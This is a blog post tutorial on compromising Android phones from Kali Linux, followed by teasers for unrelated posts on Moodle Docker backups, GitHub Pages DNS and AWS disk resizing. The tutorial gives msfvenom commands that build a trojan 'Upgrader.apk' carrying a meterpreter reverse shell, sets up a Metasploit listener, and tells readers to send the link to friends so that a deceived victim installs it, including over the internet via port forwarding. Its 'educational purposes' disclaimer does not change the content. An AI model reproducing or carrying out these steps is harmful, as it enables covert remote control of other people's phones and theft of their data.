Kali Linux [Android Hacking]

-

 This is a tutorial explaining how to hack android phones with Kali.

We do not support black hat hacking, and we do not reply and respond to such requests. This article is meant only for educational purposes.

I can't see any tutorials explaining this Hack/Exploit, so, I made one.

Step 1: 

Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • OR msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /var/www/html/Upgrader.apk (if you used service apache2 start)
  • You can also hack android on WAN i.e. through Internet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section

Step 2: 

Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole


Step 3: 

Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler 
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external) 



Step 4:

Exploit!

    • At last type: exploit to start the listener.
    • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone. 
    • Then send it using Uploading it to Dropbox or any sharing website
    • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET) 
    • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
    • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
    • And when he clicks Open...
Step 5: 

BOOM!

There comes the meterpreter prompt: 



Comments

Post a Comment

Popular posts from this blog

Moodle Backup and Restore in Docker

-
Backup moodle & mariadb images to a folder First, Run the docker commit container command this is just for copying the container image (where  moodle-moodle-1 &   moodle-mariadb-1   is the name of the constainer try: "docker ps" to look for the name of that container you want to commit ) : # docker commit -p moodle-moodle-1 backup-moodle-moodle-1 # docker commit -p moodle-mariadb-1 backup-moodle-mariadb-1 Alternatively, we can save it as a tar file in any directory and move it freely to any desired docker host system for a deployment: # docker save -o ~/backup-moodle-moodle-1.tar backup-moodle-moodle-1 # docker save -o ~/backup-moodle-mariadb-1.tar backup-moodle-mariadb-1 Backing up Docker volumes to a folder # docker volume ls Secondly , Backup the data in the docker volumes into a compressed file archive and save it to the local directory /tmp or any directory you want (just change only the /tmp to any directory you want) the  mariadb_data, moodle_data, mo...
Read more

Custom Domain to GitHub Pages (Hostinger Edition)

-
Image
Go to your Hostinger domain DNS settings The first step is to go to your Hostinger domain DNS settings. You can do this by visiting  https://hpanel.hostinger.com/domain/yourdomain.com/dns . Create two new CNAME records We need to create two new CNAME records. The first record will point  www.yourdomain.com  to  <your-github-username>.github.io . The second record will point  yourdomain.com  to  <your-github-username>.github.io . Enter Type - CNAME, Name - www, Points to - .github.io, TTL you can leave as default. This is for when someone types  www.yourdomain.com . Then we need the same for APEX domains or when someone just types  yourdomain.com , for this enter another CNAME with Name - @ and Points to .github.io. This will automatically set an ALIAS type and add it to the DNS records.  Add the GitHub Pages IP addresses Finally, we need to add the IP addresses and the txt value(this is obtain in the github/gitlab itself) for...
Read more

Resizing partition in AWS

-
  First lsblk If Using a Standard Partition (No LVM) Resize the partition: sudo growpart /dev/nvme0n1 1 Resize the filesystem: sudo resize2fs /dev/nvme0n1p1 # For ext4 sudo xfs_growfs /dev/nvme0n1p1 # For XFS Step 4: Verify the New Storage df -h You should now see the increased disk space. 🚀
Read more